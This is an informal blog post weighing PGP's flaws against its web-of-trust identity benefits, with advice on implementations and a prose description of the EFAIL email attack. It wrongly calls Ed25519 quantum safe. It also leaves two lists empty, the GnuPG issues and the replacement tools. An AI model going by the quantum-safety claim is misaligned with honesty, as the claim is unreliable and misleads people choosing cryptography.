recently, it seems that people have being going absolutely wild over the Pretty Good Privacy tool (better known as PGP). people have been saying its bad, others saying its good, some saying its awful and others saying its amazing. in this post, we'll break down together the problems with PGP, the good parts of PGP, the bad parts, the amazing parts, whether you should use it or not, and what you should use instead of it.

1. the issues

the main issue with PGP is this: it is ancient software. PGP was made before serious modern cryptography was invented, before one cryptographic task had one good and solid algorithm for it. PGP also boasts weird design choices, and absurd complexity. another large issue is actually the community surrounding it; they often refuse to let go of ancient algorithms and insist on having backwards portability with the 1990s. as Latacora said in their "The PGP Problem" article (highly recommend reading!!), you cannot have good cryptography that is also backwards compatible with the 1990s. it does not happen.

apart from PGP itself, like said earlier, the community surrounding it is also pretty bad. GPG, an incredibly large, memory unsafe, ancient tool featuring over 56 CVEs is called by many as "the standard PGP implementation". this, again, is absolutely awful, as gnupg is incredibly insecure. i could quite literally make an entire blog post talking about the issues with gnupg. these include:

..and many, many, many more. and in spite of this, package managers still use it, thousands of people still use it, and most of them refuse to switch to blatantly better alternatives, such as sequoia or RNP.

but, lets say theres nothing wrong with PGP, and nothing wrong with gnupg. if thats so, then theres still not much reason to use it. lets say you want to send an encrypted message to a friend. pgp can do that, and can be E2EE, but so can the Signal messenger, but signal is way less complex, modern, and has numerous privacy features such as forward secrecy, which PGP doesnt have. what about encrypting a file? age does it better. signing? signify. transporting secret files? ssh or Magic Wormhole. so, if we take away all the security issues and such, we are still left with an ancient, absurdly complex tool, which doesnt do anything better than any other tool that already exists.

2. the good

let's give pgp a break for a minute. pgp is actually a really good tool, sure, it may not be the best at what it does, but what most people use it for is one thing: identity.

the internet is insanely hard to have an identity on. impersonators are everywhere, and you can never be sure who is who. pgp fixes this by implementing a web of trust. pgp allows you to sign other people's keys, which allow you to basically say "yeah, this person is who they say they are.". basically nothing else on the internet can do this. the pgp community also often has real-life signing parties, where you can go out and meet people face to face in order to be able to trust that. Latacora's article calls this an issue, when it's not. it's a incredibly useful feature that actually fixes the identity problem on the internet, and allows you to actually know who someone is. again, basically no other tool on the internet does this. and because of how integrated PGP is, this web of trust is already well-established.

another factor that makes PGP a genuinely good tool is that it combines pretty much everything. sure, PGP may have an absurd setup ritual, but after you've set it up, you have an identity, you can sign, you can encrypt, and much more. as an all-in-one privacy tool, this is amazing. it ties in well with identity.

3. how to use it properly

so we've established the good parts of pgp, and the bad. the main bad part of pgp is the community, and the tools that people use. this section will explain to you how to use pgp safely, what tools to use, and what to definitely not what to do.

  1. switch implementations

    we said earlier that gnupg is awful, and pretty dangerous. so what should you use instead? there are quite a few options, with the best out of them (in my opinion) being sequoia. sequoia implements more modern tooling, is memory safe thanks to rust, and has a much smaller codebase than gnupg. it focuses on robustness, correctness, and user security. and luckily, making the move from gnupg to sequioa is even easier thanks to sequoia providing the chameleon tool, which essentially provides a gnupg-like frontend to sequoia. other options include RNP, which is arguably less secure but is faster. both are miles better than gnupg.

  2. never use it in email clients

    this is a huge one. if you are unaware, there is a vulnerability not with pgp specifically, but moreover how it is implemented in numerous email clients. essentially, since email clients can automatically decrypt PGP encrypted messages, you can sandwich an encrypted PGP message between two html tags with an image link in them, which, if the email client handles it badly, will decrypt the PGP message, then request the image from the attackers server, with the decrypted PGP message within it, which the attacker can then read over. in short, use email clients without pgp. most email clients have fixed this vulnerability, but better be safe than sorry. if you want to learn more, read the efail papers.

  3. use modern, quantum safe algorithms

    basically dont use RSA. RSA is ancient, and with the rise of quantum computing, it is actively getting weaker. you should switch to a more modern algorithm, such as Ed25519. it has smaller keys anyway.

  4. expect the worst with encryption

    always expect the worst with encryption with PGP. many PGP users often experience one of their recipients accidentally forwarding a decrypted PGP message to someone. just be careful who you send your mail to.

  5. dont use encryption for highly sensitive conversations

    in my eyes, PGP for encrypting messages are like using VPNs. its good if you dont need maximum privacy, but when you do need maximum privacy, they wont supply it. you can use pgp for somewhat sensitive conversations, but for highly sensitive ones, use signal.

4. what to use instead

although pgp is a good tool, it does have its numerous issues. this section will go over each use of pgp, and a related tool you can use to replace it.

conclusion

in conclusion, yes, PGP does have it's numerous issues, but alot of the other issues assosciated with it are actually mostly done by the community. good implementations of PGP do actually exist, just most remain unused compared to the insecure alternatives. in short, dont use gpg.